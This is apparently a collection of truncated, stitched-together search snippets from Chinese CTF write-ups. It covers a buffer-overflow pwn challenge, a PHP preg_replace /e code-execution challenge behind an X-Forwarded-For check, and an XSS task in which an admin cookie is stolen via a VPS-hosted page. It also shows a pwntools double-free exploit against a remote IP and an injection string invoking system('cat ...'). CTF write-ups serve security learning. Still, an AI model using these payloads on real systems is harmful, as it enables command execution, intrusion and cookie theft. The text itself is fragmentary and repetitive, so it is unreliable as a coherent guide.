system("cat flag.txt"); return 0LL; } __int64 __fastcall main(__int64 a1, char **a2, char **a3) { alarm(0x3Cu); setbuf(stdout, 0LL); puts("~~ welcome to ctf ~~ "); puts("lets get helloworld for bof"); read(0, &Buf_601068, 0x10uLL); if ( target_6010...
具体方法参考:[CTF/网络安全] 攻防世界 xff_referer 解题详析/e 修正符/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码 subject和pattern满足该函数下的规则即可,无特殊要求。 构造Payload如下,实现将sub中的qiu替换为system('find -name *flag*'),从而执行命令...
pat=/1/e&rep=system("cat++./s3chahahaDir/flag/flag.php") =123 获得flag。
把payload写在自己的VPS的1.html上,然后在contact.php向管理员发送地址http://zzm.cat/1.html即可,打到cookie后进入http://seafaring.xctf.org.cn:9999/admin/,前端源码发现了一些api调用,可以获取admin接收到的消息 functionview_unreads(){$.ajax({type:"POST",url:"/admin/handle_message.php",data:{"to...
Team-Page:http://nu1l-ctf.com PWN easiest Double Free,测了一下远程,不是tcache 没有Leak 有一个后门函数 用GOT表里面的0x40做size from pwn import * #p = process('./easiest') p = remote('39.96.9.148', 9999) def add(idx, size, c): ...
page=abc’) or system(“cat XCTF攻防世界:MISC新手题解 XCTF攻防世界:MISC新手题解 this_is_flag ext3 this_is_flag 纯属签到题,直接将 flag 值复制提交就好。 ext3 先下载到linux系统上,用file看看文件类型。 是Linux文件,又是ext3格式,使用mount挂载上来。 查找一下flag文件的位置。 使用base64对flag...
一番搜索之后在家目录下发现了flag的文件,cat命令读取一下得到flag。 simple_php 代码: <?phpshow_source(__FILE__);include("config.php");$a=@$_GET['a'];$b=@$_GET['b'];if($a==0and$a){echo$flag1;}if(is_numeric($b)){exit();}if($b>1234){echo$flag2;}?> ...
php }} //方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试 if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { echo "Welcome My Admin ! "; $pattern = $_GET[pat]; $replacement = $_GET[rep]; $subject = $_GET[sub]; if (isset($pattern) && isset($replacement) ...
}}//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试if($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {echo"Welcome My Admin ! ";$pattern=$_GET[pat];$replacement=$_GET[rep];$subject=$_GET[sub];if(isset($pattern) &&isset($replacement) &&isset($subject)) {preg...
php}}//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试if($_SERVER['HTTP_X_FORWARDED_FOR'] ==='127.0.0.1') {echo"Welcome My Admin ! ";$pattern=$_GET[pat];$replacement=$_GET[rep];$subject=$_GET[sub];if(isset($pattern) &&isset($replacement) &&isset($subject)) {preg...